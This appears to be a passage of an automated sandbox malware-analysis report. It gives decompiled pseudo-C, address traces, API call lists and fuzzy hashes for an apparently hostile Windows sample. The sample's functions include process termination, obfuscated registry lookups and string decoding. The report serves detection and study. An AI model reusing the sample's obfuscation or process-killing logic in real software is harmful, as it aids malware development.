0x00403a8c
0x00403a8c
0x00403a8f
0x00403a91
0x00000000
0x00000000
0x00000000
0x00000000
0x00403a73
0x00403a73
0x00403a73
0x00403a76
0x00403a78
0x00000000
0x00000000
0x00000000
0x00000000
0x00403a5a
0x00403a5a
0x00403a5a
0x00403a5d
0x00403a5f
0x00000000
0x00000000
0x00000000
0x00000000
0x00403a41
0x00403a41
0x00403a41
0x00403a44
0x00403a46
0x00000000
0x00000000
0x00000000
0x00000000
0x00403a28
0x00403a28
0x00403a28
0x00403a2b
0x00403a2d
0x00000000
0x00000000
0x00000000
0x00000000
0x00403a15
0x00403a15
0x00403a15
0x00403a18
0x00403a1a
0x00000000
0x00000000
0x00000000
0x00000000
0x004039fc
0x004039fc
0x004039fc
0x004039ff
0x00403a01
0x00000000
0x00000000
0x00000000
0x00000000
0x004039e3
0x004039e3
0x004039e3
0x004039e6
0x004039e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004039ca
0x004039ca
0x004039ca
0x004039cd
0x004039cf
0x00000000
0x00000000
0x00000000
0x00000000
0x004039b7
0x004039b7
0x004039b7
0x004039ba
0x004039bc
0x00000000
0x00000000
0x00000000
0x00000000
0x0040399e
0x0040399e
0x0040399e
0x004039a1
0x004039a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00403985
0x00403985
0x00403985
0x00403988
0x0040398a
0x00000000
0x00000000
0x00000000
0x00000000
0x00403972
0x00403972
0x00403972
0x00403975
0x00403977
0x00000000
0x00000000
0x00000000
0x00000000
0x00403959
0x00403959
0x00403959
0x0040395c
0x0040395e
0x00000000
0x00000000
0x00000000
0x00000000
0x00403940
0x00403940
0x00403940
0x00403943
0x00403945
0x00000000
0x00000000
0x00000000
0x00000000
0x00403927
0x00403927
0x00403927
0x0040392a
0x0040392c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040390e
0x0040390e
0x0040390e
0x00403911
0x00403913
0x00000000
0x00000000
0x00000000
0x00000000
0x004038f5
0x004038f5
0x004038f5
0x004038f8
0x004038fa
0x00000000
0x00000000
0x00000000
0x00000000
0x004038e2
0x004038e2
0x004038e2
0x004038e5
0x004038e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004038c9
0x004038c9
0x004038c9
0x004038cc
0x004038ce
0x00000000
0x00000000
0x00000000
0x00000000
0x004038b0
0x004038b0
0x004038b0
0x004038b3
0x004038b5
0x00000000
0x00000000
0x00000000
0x00000000
0x00403897
0x00403897
0x00403897
0x0040389a
0x0040389c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040387e
0x0040387e
0x0040387e
0x00403881
0x00403883
0x00000000
0x00000000
0x00000000
0x00000000
0x00403865
0x00403865
0x00403865
0x00403868
0x0040386a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040384c
0x0040384c
0x0040384c
0x0040384f
0x00403851
0x00000000
0x00000000
0x00000000
0x00000000
0x00403833
0x00403833
0x00403833
0x00403836
0x00403838
0x00000000
0x00000000
0x00000000
0x00000000
0x0040381a
0x0040381a
0x0040381a
0x0040381d
0x0040381f
0x00000000
0x00000000
0x00000000
0x00000000
0x00403801
0x00403801
0x00403801
0x00403804
0x00403806
0x00000000
0x00000000
0x00000000
0x00000000
0x004037e8
0x004037e8
0x004037e8
0x004037eb
0x004037ed
0x00000000
0x00000000
0x00000000
0x00000000
0x004037cf
0x004037cf
0x004037cf
0x004037d2
0x004037d4
0x00000000
0x00000000
0x00000000
0x00000000
0x004037b6
0x004037b6
0x004037b6
0x004037b9
0x004037bb
0x00000000
0x00000000
0x00000000
0x00000000
0x004037a3
0x004037a3
0x004037a3
0x004037a6
0x004037a8
0x00000000
0x00000000
0x00000000
0x00000000
0x0040378a
0x0040378a
0x0040378a
0x0040378d
0x0040378f
0x00000000
0x00000000
0x00000000
0x00000000
0x00403771
0x00403771
0x00403771
0x00403774
0x00403776
0x00000000
0x00000000
0x00000000
0x00000000
0x00403758
0x00403758
0x00403758
0x0040375b
0x0040375d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040373f
0x0040373f
0x0040373f
0x00403742
0x00403744
0x00000000

APIs

Part of subcall function 0040744A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000056,0000005E,004036B9), ref: 00407460
Part of subcall function 0040744A: VirtualAlloc.KERNELBASE(00000000,0000022C,00003000,00000004), ref: 00407474

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

TerminateProcess.KERNELBASE(00000000,00000000), ref: 0040370A
CloseHandle.KERNEL32(00000000), ref: 0040370D

Part of subcall function 00407499: VirtualFree.KERNELBASE(?,00000000,00008000,0000005E,00403AD3), ref: 004074AA
Part of subcall function 00407499: CloseHandle.KERNEL32(?), ref: 004074B3

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: CloseHandleVirtual$AllocCreateFreeLibraryLoadProcessSnapshotTerminateToolhelp32
String ID:
API String ID: 1447636202-0
Opcode ID: 9de8ea0d441d20169a3ea111925324daa247a651decabb922d97d18b7abcd111
Instruction ID: 670b05c2176061c101fa2db3a96757f5b1c36131d4a6cf4f23a28858d4ef163a
Opcode Fuzzy Hash: 9de8ea0d441d20169a3ea111925324daa247a651decabb922d97d18b7abcd111
Instruction Fuzzy Hash: 6AF2E8659643689AEB21DBA0DC51BEAB374EF54711F1054EAD60CEB2A0F3B54FC08F09

Uniqueness

Uniqueness Score: 100.00%

Function 0042A24D, Relevance: 4.7, APIs: 3, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0042A24D(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				signed int _t41;
				intOrPtr _t46;
				signed int _t48;
				void* _t50;
				intOrPtr _t52;
				signed int _t54;
				intOrPtr _t61;
				intOrPtr _t66;
				intOrPtr* _t69;
				intOrPtr _t83;
				intOrPtr* _t89;
				intOrPtr _t91;
				intOrPtr _t93;
				signed int _t94;
				void* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t101;

				_t41 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t41 ^ _t94;
				_t91 = _a20;
				if(_t91 > 0) {
					_t66 = E004214C6(_a16, _t91);
					_t101 = _t66 - _t91;
					_t4 = _t66 + 1; // 0x1
					_t91 = _t4;
					if(_t101 >= 0) {
						_t91 = _t66;
					}
				}
				_t86 = _a32;
				if(_a32 == 0) {
					_t86 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t46 = E0042C251(_t86, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t91, 0, 0);
				_t83 = _t46;
				_t96 = _t95 + 0x18;
				_v12 = _t83;
				if(_t83 == 0) {
					L39:
					E00415A87();
					return _t46;
				} else {
					_t17 = _t83 + _t83 + 8; // 0x8
					asm("sbb eax, eax");
					_t48 = _t83 + _t83 & _t17;
					if(_t48 == 0) {
						_t69 = 0;
						L15:
						if(_t69 == 0) {
							L37:
							_t93 = 0;
							L38:
							E004147BD(_t69);
							_t46 = _t93;
							goto L39;
						}
						_t50 = E0042C251(_t86, 1, _a16, _t91, _t69, _t83);
						_t98 = _t96 + 0x18;
						if(_t50 == 0) {
							goto L37;
						}
						_t88 = _v12;
						_t52 = E00425F14(_a8, _a12, _t69, _v12, 0, 0, 0, 0, 0); // executed
						_t93 = _t52;
						if(_t93 == 0) {
							goto L37;
						}
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t93 + _t93 + 8; // 0x8
							asm("sbb eax, eax");
							_t54 = _t93 + _t93 & _t31;
							if(_t54 == 0) {
								_t89 = 0;
								L31:
								if(_t89 == 0 || E00425F14(_a8, _a12, _t69, _v12, _t89, _t93, 0, 0, 0) == 0) {
									L36:
									E004147BD(_t89);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t93);
									_push(_t89);
									_push(0);
									_push(_a32);
									_t93 = E0042C2CD();
									if(_t93 != 0) {
										E004147BD(_t89);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t54 > 0x400) {
								_t89 = E0042151C(_t54);
								if(_t89 == 0) {
									goto L36;
								}
								 *_t89 = 0xdddd;
								L29:
								_t89 = _t89 + 8;
								goto L31;
							}
							E00415B70();
							_t89 = _t98;
							if(_t89 == 0) {
								goto L36;
							}
							 *_t89 = 0xcccc;
							goto L29;
						}
						_t61 = _a28;
						if(_t61 == 0) {
							goto L38;
						}
						if(_t93 > _t61) {
							goto L37;
						}
						_t93 = E00425F14(_a8, _a12, _t69, _t88, _a24, _t61, 0, 0, 0);
						if(_t93 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t48 > 0x400) {
						_t69 = E0042151C(_t48);
						if(_t69 == 0) {
							L13:
							_t83 = _v12;
							goto L15;
						}
						 *_t69 = 0xdddd;
						L12:
						_t69 = _t69 + 8;
						goto L13;
					}
					E00415B70();
					_t69 = _t96;
					if(_t69 == 0) {
						goto L13;
					}
					 *_t69 = 0xcccc;
					goto L12;
				}
			}

0x0042a254
0x0042a25b
0x0042a260
0x0042a266
0x0042a26c
0x0042a272
0x0042a275
0x0042a275
0x0042a278
0x0042a27a
0x0042a27a
0x0042a278
0x0042a27c
0x0042a281
0x0042a288
0x0042a28b
0x0042a28b
0x0042a2a7
0x0042a2ac
0x0042a2ae
0x0042a2b1
0x0042a2b6
0x0042a414
0x0042a41f
0x0042a427
0x0042a2bc
0x0042a2bf
0x0042a2c4
0x0042a2c6
0x0042a2c8
0x0042a2ff
0x0042a301
0x0042a303
0x0042a409
0x0042a409
0x0042a40b
0x0042a40c
0x0042a412
0x00000000
0x0042a412
0x0042a312
0x0042a317
0x0042a31c
0x00000000
0x00000000
0x0042a322
0x0042a334
0x0042a339
0x0042a33d
0x00000000
0x00000000
0x0042a34b
0x0042a388
0x0042a38d
0x0042a38f
0x0042a391
0x0042a3c2
0x0042a3c4
0x0042a3c6
0x0042a402
0x0042a403
0x00000000
0x0042a3e3
0x0042a3e5
0x0042a3e6
0x0042a3ea
0x0042a428
0x0042a42b
0x0042a3ec
0x0042a3ec
0x0042a3ed
0x0042a3ed
0x0042a3ee
0x0042a3ef
0x0042a3f0
0x0042a3f1
0x0042a3f9
0x0042a400
0x0042a431
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a400
0x0042a3c6
0x0042a395
0x0042a3b0
0x0042a3b5
0x00000000
0x00000000
0x0042a3b7
0x0042a3bd
0x0042a3bd
0x00000000
0x0042a3bd
0x0042a397
0x0042a39c
0x0042a3a0
0x00000000
0x00000000
0x0042a3a2
0x00000000
0x0042a3a2
0x0042a34d
0x0042a352
0x00000000
0x00000000
0x0042a35a
0x00000000
0x00000000
0x0042a376
0x0042a37a
0x00000000
0x00000000
0x00000000
0x0042a380
0x0042a2cf
0x0042a2ea
0x0042a2ef
0x0042a2fa
0x0042a2fa
0x00000000
0x0042a2fa
0x0042a2f1
0x0042a2f7
0x0042a2f7
0x00000000
0x0042a2f7
0x0042a2d1
0x0042a2d6
0x0042a2da
0x00000000
0x00000000
0x0042a2dc
0x00000000
0x0042a2dc

APIs

Part of subcall function 0042C251: MultiByteToWideChar.KERNEL32(0042D2F0,00000100,E8458D00,00000000,00000000,00000020,?,0042A195,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 0042C2C1

__freea.LIBCMT ref: 0042A431

Part of subcall function 00425F14: LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,0042A339,?,?,00000000,?,00000000), ref: 00425F66

Part of subcall function 0042151C: RtlAllocateHeap.NTDLL(00000000,0041370C,?,?,00416C35,?,?,1FFFFFFF,00000008,?,00413478,0041370C,?,?,?,?), ref: 0042154E

__freea.LIBCMT ref: 0042A403
__freea.LIBCMT ref: 0042A40C

Part of subcall function 004147BD: _free.LIBCMT ref: 004147D3

Part of subcall function 0042C2CD: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00427291,?,00000000,?,?,?,00427008,0000FDE9,00000000,?), ref: 0042C36F

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: __freea$ByteCharMultiWide$AllocateFeatureHeapPresentProcessorString___raise_securityfailure_free
String ID:
API String ID: 1088794066-0
Opcode ID: 7c3c322e64670c25e7acd50ca6a5de3c95e2876c1d68e75d652fa35731d1b683
Instruction ID: 6f33e88f00e1c1afa8efd02a7b8d878ca4934c1d9db6d1d0569a7c6cf1fb15ed
Opcode Fuzzy Hash: 7c3c322e64670c25e7acd50ca6a5de3c95e2876c1d68e75d652fa35731d1b683
Instruction Fuzzy Hash: F7517532700126AFDB20AF50AC45EBB37A9EF80310F95001BFC0497241E77DCC6196AA

Uniqueness

Uniqueness Score: 4.01%

Function 00413000, Relevance: 4.6, APIs: 3, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00413000(signed char __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed char _v28;
				void* __ebx;
				void* __ebp;
				signed int _t23;
				signed char _t29;
				signed char _t33;
				void* _t35;
				intOrPtr _t36;
				intOrPtr _t39;
				signed char _t41;
				void* _t44;
				void* _t45;
				signed char* _t47;
				signed int _t50;
				intOrPtr _t53;
				intOrPtr _t54;

				_t45 = __edx;
				_t41 = __ecx;
				_push(0xffffffff);
				_push(E00435DD0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_t54 = _t53 - 0xc;
				_v20 = _t54;
				_t47 = __ecx;
				_v28 = __ecx;
				_t39 = _a4;
				if(_t39 != 0) {
					L6:
					if(_t39 < 0x1000) {
						_t23 = E0041500C(_t45, __eflags, _t39); // executed
						_t54 = _t54 + 4;
						_t50 = _t23;
						__eflags = _t50;
						if(__eflags != 0) {
							goto L2;
						} else {
							E0041A825(_t39, _t41, _t45, __eflags);
							goto L14;
						}
					} else {
						_t35 = _t39 + 0x23;
						_t62 = _t35 - _t39;
						if(_t35 <= _t39) {
							_t35 = E00415C7B(_t45, _t62);
						}
						_t36 = E0041500C(_t45, _t62, _t35); // executed
						_t54 = _t54 + 4;
						_t63 = _t36;
						if(_t36 == 0) {
							_t36 = E0041A825(_t39, _t41, _t45, _t63);
						}
						_t14 = _t36 + 0x23; // 0x23
						_t50 = _t14 & 0xffffffe0;
						 *((intOrPtr*)(_t50 - 4)) = _t36;
						goto L2;
					}
				} else {
					_t50 = 0;
					L2:
					_v24 = _t50;
					_v8 = 0;
					E00402F90( *_t47, _t47[4], _t50);
					_v8 = 0xffffffff;
					_t41 =  *_t47;
					_a4 = _t47[4] - _t41;
					if(_t41 != 0) {
						if(_t47[8] - _t41 < 0x1000) {
							L21:
							L0041503F(_t41);
						} else {
							_t60 = _t41 & 0x0000001f;
							if((_t41 & 0x0000001f) == 0) {
								L14:
								_t33 =  *(_t41 - 4);
								__eflags = _t33 - _t41;
								if(__eflags >= 0) {
									_t33 = E0041A825(_t39, _t41, _t45, __eflags);
								}
								_t44 = _t41 - _t33;
								__eflags = _t44 - 4;
								if(__eflags < 0) {
									_t33 = E0041A825(_t39, _t44, _t45, __eflags);
								}
								__eflags = _t44 - 0x23;
								if(__eflags > 0) {
									_t33 = E0041A825(_t39, _t44, _t45, __eflags);
								}
								_t41 = _t33;
								goto L21;
							} else {
								E0041A825(_t39, _t41, _t45, _t60);
								goto L6;
							}
						}
					}
				}
				_t47[8] = _t50 + _t39;
				_t29 = _a4 + _t50;
				__eflags = _t29;
				_t47[4] = _t29;
				 *_t47 = _t50;
				 *[fs:0x0] = _v16;
				return _t29;
			}

0x00413000
0x00413000
0x00413003
0x00413005
0x00413010
0x00413011
0x00413018
0x0041301e
0x00413021
0x00413023
0x00413026
0x0041302b
0x00413075
0x0041307b
0x004130a7
0x004130ac
0x004130af
0x004130b1
0x004130b3
0x00000000
0x004130b9
0x004130b9
0x00000000
0x004130b9
0x0041307d
0x0041307d
0x00413080
0x00413082
0x00413084
0x00413084
0x0041308a
0x0041308f
0x00413092
0x00413094
0x00413096
0x00413096
0x0041309b
0x0041309e
0x004130a1
0x00000000
0x004130a1
0x0041302d
0x0041302d
0x0041302f
0x0041302f
0x00413032
0x00413041
0x00413046
0x0041304d
0x00413054
0x00413059
0x00413069
0x004130e2
0x004130e3
0x0041306b
0x0041306b
0x0041306e
0x004130be
0x004130be
0x004130c1
0x004130c3
0x004130c5
0x004130c5
0x004130ca
0x004130cc
0x004130cf
0x004130d1
0x004130d1
0x004130d6
0x004130d9
0x004130db
0x004130db
0x004130e0
0x00000000
0x00413070
0x00413070
0x00000000
0x00413070
0x0041306e
0x00413069
0x00413059
0x004130ee
0x004130f4
0x004130f4
0x004130f6
0x004130f9
0x004130fe
0x0041310b

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00413084

Part of subcall function 00415C7B: __CxxThrowException@8.LIBVCRUNTIME ref: 00415C92

new.LIBCMT ref: 0041308A
new.LIBCMT ref: 004130A7

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_task$Exception@8Throw
String ID:
API String ID: 3339364867-0
Opcode ID: 4640e310fbeaf7d3147a086a4e270e298c29469450d2b299cc061eadd1d8596c
Instruction ID: 40f397c6252482c8ec6531e2f234d386bc24c975ad2f9e32832d7c5e44bee417
Opcode Fuzzy Hash: 4640e310fbeaf7d3147a086a4e270e298c29469450d2b299cc061eadd1d8596c
Instruction Fuzzy Hash: 0831D1B1A016059FC714EF69C9816EEBBE4AF08359F10422FE416D3345D7389A94C6DA

Uniqueness

Uniqueness Score: 6.84%

Function 004074E3, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 44
memoryUNIQUE

Download Yara Rule

C-Code - Quality: 88%

			E004074E3(intOrPtr _a4, intOrPtr _a8) {
				char _v260;
				void* _t7;
				void* _t19;
				void* _t20;

				_t7 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
				_t20 = _t7;
				E004074C8(_t20, ".oj=294~!z3)9n-1,8^)o((q22)lb$");
				_pop(_t19);
				_t23 = _t20;
				if(_t20 != 0) {
					E0040C70B( &_v260, 0, 0x100);
					E004076B9(_t19, _t23,  &_v260, _t20, E00405CA9(_t20));
					E00407649(_t19,  &_v260, _a4, _a8);
					VirtualFree(_t20, 0, 0x8000); // executed
				}
				return _a4;
			}

0x004074f8
0x004074fe
0x00407506
0x0040750c
0x0040750d
0x0040750f
0x0040751f
0x00407533
0x00407545
0x00407555
0x00407555
0x00407562

APIs

VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004,7757BFA8), ref: 004074F8
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407555

Strings

.oj=294~!z3)9n-1,8^)o((q22)lb$, xrefs: 00407500

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$AllocFree
String ID: .oj=294~!z3)9n-1,8^)o((q22)lb$
API String ID: 2087232378-58175332
Opcode ID: 3caaf02cc94c11765fb681d538c176f28779672b62ad813e8d3e0d2d6ed93f29
Instruction ID: 1eb0e0f3d35a5b0fe05ffe3162aa2ccf060f48eb6a4ee831fa2293589715e0c2
Opcode Fuzzy Hash: 3caaf02cc94c11765fb681d538c176f28779672b62ad813e8d3e0d2d6ed93f29
Instruction Fuzzy Hash: 13F0A435A8571876DB2267559C4BFDA3B5CAB08714F104067FB08B61C0DAB966804AED

Uniqueness

Uniqueness Score: 100.00%

Function 0042CECB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 0042CEFD

Part of subcall function 0042A148: GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 0042A218

Strings

, xrefs: 0042CF42

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: InfoStringType
String ID:
API String ID: 3581009595-3916222277
Opcode ID: cf06ed4cb444a8c18ed2f6f73754fe6f3646da83975865ab4f3c4731c821f036
Instruction ID: cee76f4dc28bf504ae3df7e4a64593a48ed4a5895fdaa8d4d8ae2e41231a7881
Opcode Fuzzy Hash: cf06ed4cb444a8c18ed2f6f73754fe6f3646da83975865ab4f3c4731c821f036
Instruction Fuzzy Hash: 4641AD707042685BDB218B18DDC4BFFBBEEDB05308FA404AEE58A87182D2799D45DB25

Uniqueness

Uniqueness Score: 0.05%

Function 00404FF6, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90
UNIQUE

Download Yara Rule

C-Code - Quality: 97%

			E00404FF6() {
				WCHAR* _v8;
				short _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				void* __ebx;
				void* __esi;
				WCHAR* _t35;
				void* _t40;
				void* _t44;
				void* _t47;
				void* _t49;
				void* _t51;
				WCHAR* _t53;
				short* _t54;
				void* _t55;

				_t51 = 0; // executed
				_t35 = E0040C6BA(0x8a); // executed
				_t53 = _t35;
				_pop(_t49);
				if(_t53 == 0) {
					L8:
					return _t51;
				}
				_v8 = _t35;
				_t54 =  &(_t53[7]);
				_t47 = 1;
				while(1) {
					wsprintfW(_t35, L"%d", _t47);
					_v124 = 0x31910509;
					_t47 = _t47 + 1;
					_v120 = 0xafae1f2b;
					_v116 = 0x7cdc4ffd;
					_v112 = 0x443a6ddc;
					_v108 = 0x6ca261b9;
					_v104 = 0x6ca26189;
					_v100 = 0x9d945e7c;
					_v96 = 0x7be128f1;
					_v92 = 0x89d239ce;
					_v88 = 0xb9f78db;
					_v84 = 0x2c807e51;
					_v80 = 0x78e74393;
					_v76 = 0xfdba3bd5;
					_v72 = 0x61879e3c;
					_v68 = 0xa4745cab;
					_v64 = 0x8c4ac799;
					_v60 = 0xa8131019;
					_v56 = 0x22f6dd07;
					_t40 = E00404BC2(_t47, _t49, _t54, 1, 0x80000001, E00407563( &_v124), _v8, _t54, 0x80, 0); // executed
					_t55 = _t55 + 0x28;
					if(_t40 != 0) {
						_v52 = 0x9d3c14ca;
						_v48 = 0x14cc44b6;
						_v44 = 0x463a7e42;
						_v40 = 0x51a9407b;
						_v36 = 0x19779719;
						_v32 = 0x1977970b;
						_v28 = 0x60f37d60;
						_v24 = 0x5aab6536;
						_v20 = 0x7aae77f5;
						_v16 = 0xb3a50a66;
						_v12 = 0xd450;
						_t44 = E00401AC8(_t54, E00407563( &_v52));
						_t55 = _t55 + 0xc;
						if(_t44 == 0) {
							_t51 = 1;
						}
					}
					if(_t47 == 9) {
						break;
					}
					_t35 = _v8;
					if(_t51 == 0) {
						continue;
					}
					break;
				}
				E0040C6D1(_t54); // executed
				goto L8;
			}

0x00405003
0x00405005
0x0040500a
0x0040500c
0x0040500f
0x0040514f
0x00405156
0x00405156
0x00405018
0x0040501b
0x0040501e
0x0040501f
0x00405026
0x0040502f
0x00405037
0x00405038
0x0040503f
0x00405046
0x0040504d
0x00405054
0x0040505b
0x00405062
0x00405069
0x00405070
0x00405077
0x0040507e
0x00405085
0x0040508c
0x00405093
0x0040509a
0x004050a1
0x004050a8
0x004050c5
0x004050ca
0x004050cf
0x004050d4
0x004050dc
0x004050e3
0x004050ea
0x004050f1
0x004050f8
0x004050ff
0x00405106
0x0040510d
0x00405114
0x0040511b
0x00405128
0x0040512d
0x00405132
0x00405136
0x00405136
0x00405132
0x0040513a
0x00000000
0x00000000
0x0040513c
0x00405141
0x00000000
0x00000000
0x00000000
0x00405141
0x00405148
0x00000000

APIs

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

wsprintfW.USER32 ref: 00405026

Part of subcall function 00404BC2: RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?), ref: 00404BE7
Part of subcall function 00404BC2: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,?), ref: 00404C12

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Strings

B~:F, xrefs: 004050E3

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$AllocFreeOpenQueryValuewsprintf
String ID: B~:F
API String ID: 4183336456-4095750188
Opcode ID: fcaca4ccf2fda69122217b68e90c371a405e947e99b9ca45794f2ad7a25b81bf
Instruction ID: 66bbab4dfb782ac237ee298bafce62b1da2dcefe4d00400a840a47f2d981f15e
Opcode Fuzzy Hash: fcaca4ccf2fda69122217b68e90c371a405e947e99b9ca45794f2ad7a25b81bf
Instruction Fuzzy Hash: 583175B5D01318ABDB20DFE6D881ADEBB78FF40714F20412AE9097B345D7395A428F99

Uniqueness

Uniqueness Score: 100.00%

Function 0040FB00, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73
UNIQUE

Download Yara Rule

C-Code - Quality: 68%

			E0040FB00(void* __ecx, char _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				char _v28;
				intOrPtr _v48;
				intOrPtr* _v52;
				void* __ebx;
				signed int _t52;
				signed int _t61;
				intOrPtr _t67;
				intOrPtr* _t70;
				void* _t80;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr* _t88;
				signed int _t91;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr* _t109;
				char _t114;
				intOrPtr* _t115;
				signed int _t120;
				intOrPtr* _t121;
				void* _t123;
				intOrPtr _t124;
				intOrPtr _t127;
				void* _t129;
				intOrPtr _t130;

				_t130 = _t129 - 0x10;
				_t114 = _a4;
				_t80 = __ecx;
				_t88 = __ecx + 4;
				E0040E900(_t88,  &_a4, _t114);
				if(_v4 ==  *((intOrPtr*)(__ecx + 8))) {
					_a4 = 0x4379ac;
					E00416C8D( &_v4, 0x447c2c); // executed
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t123);
					_t124 = _t130;
					_push(0xffffffff);
					_push(E00435D80);
					_push( *[fs:0x0]);
					 *[fs:0x0] = _t130;
					_push(_t80);
					_push(_t114);
					_push(_t108);
					_v48 = _t130 - 8;
					_t109 = _t88;
					_v52 = _t109;
					_t52 =  *(_t109 + 4);
					_t105 =  *_t109;
					_t91 = _t52 - _t105 >> 2;
					_t115 = _v24;
					__eflags = _t91 - _t115;
					if(__eflags <= 0) {
						if(__eflags >= 0) {
							goto L9;
						} else {
							_t82 = _a8;
							__eflags = _t82 - _t52;
							if(_t82 >= _t52) {
								L14:
								__eflags = _t115 - _t91;
								E0040BCA0(_t82, _t109, _t124, _t115 - _t91);
							} else {
								__eflags = _t105 - _t82;
